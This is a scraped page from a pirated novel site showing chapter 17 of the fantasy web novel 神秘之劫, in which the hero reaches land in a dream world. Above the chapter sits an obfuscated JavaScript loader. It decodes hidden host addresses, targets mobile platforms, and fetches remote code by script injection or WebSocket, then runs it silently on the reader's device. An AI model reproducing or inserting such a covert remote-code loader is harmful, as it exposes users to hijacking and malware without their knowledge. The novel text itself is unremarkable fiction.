笔趣阁

字:
关灯 护眼
笔趣阁 > 神秘之劫 > 第17章 陆地
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第17章 陆地

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
【领地的事情已经彻底处理,该是探索非凡与不朽之时!】
  【绿榕覆雪之月,梦中移动已经过去了43日,依旧未曾见到大陆,我有些动摇……】
  【第46日,神秘能量全部用来移动太过浪费,或许我该重新规划,将每一日入梦产生的能量分为三份,一份移动、一份强化、一份作为储备?】
  ……
  【行动第50日,梦中世界的夜晚,看到了恐怖的一幕,绯红之月上,似乎也诞生了恐怖的东西,我看到了婆娑的树影,它的每一根树杈之上,都悬挂满畸形的血肉祭品……与此同时,也听到了世界级呓语……推测又有一个类似‘黑日’的存在出现了。】
  ……
  【被父亲大人召去,参加了领地的冬日祭礼,根据观测,他似乎对绿森伯爵的头衔还算满意?】
  【绿榕沉寂之月,春天即将到来,但对我而言没有多少区别,领地一切无事,我依旧沉浸梦中……】
  ……
  写完手上最后一份笔记,亚伦打了个哈欠,换上睡衣,躺在大床上,进入了梦乡。
  这段时日以来,黑石庄园之中,关于领主得了嗜睡症的传言已经愈演愈烈,但亚伦并没有当回事。
  如果可能的话,他恨不得将一整天都投入那个异世界。
  梦中世界。
  一道意识在海面之上飞快移动。
  对于亚伦而言,这种视角不断拉近的体验,已经不再新奇。
  他真正担忧的,还是那一个个奇异现象的出现。
  “加上之前看到的奇异现象与广播,目测大概有五个恐怖的存在,已经降临在这个世界上了……祂们都伴随着那种世界范围的广播,或者说,感召与污染?”
  亚伦甚至无法确定,祂们能否发现自己。
  此时,心中不免多了更多的忧虑。
  他收敛思绪,将今日入梦产生的神秘能量分成三份,一份强化自身,一份用来赶路,一份储备起来。
  原本,亚伦以为一切又会跟从前一样,在无聊中度过。
  但今日,情况略有些不同。
  在他眼前,一抹黑线突然从海平面上跃起。
  亚伦一下怔住,几乎难以置信,或者以为自己产生了幻觉。
  但等了片刻之后,那道黑线依旧存在!
  “是陆地!”
  亚伦的意识都要沸腾起来:“终于……见到了陆地!”
  他迫不及待地上前,那片黑线不断扩张,化为一道海岸线,渐渐浮现出更多的轮廓。
  前方的并不是大陆,只是一个小小的岛屿。
  岛屿之上,苍白的树林似乎经过某种变异,宛若一只只伸向天空的手掌。
  而在阴影之中,有奇异的生物活动。
  “看来……陆地上的生物,也受到了猩红太阳的污染与影响么?”
  亚伦沉吟着,绕着海岛一圈,发现它不大,也就几十平方公里的样子。
  不过,带来的鼓舞还是非同小可。
  至少,这是他遇到的第一片陆地。
  “或许……真正的大陆架,已经并不遥远……”
  ……
  虽然如此激励自己,但亚伦还是在前进了二十余日之后,才发现了真正的大陆。
  一望无际的海岸线,不知其许的纵深。
  “终于……终于上了岸!”
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师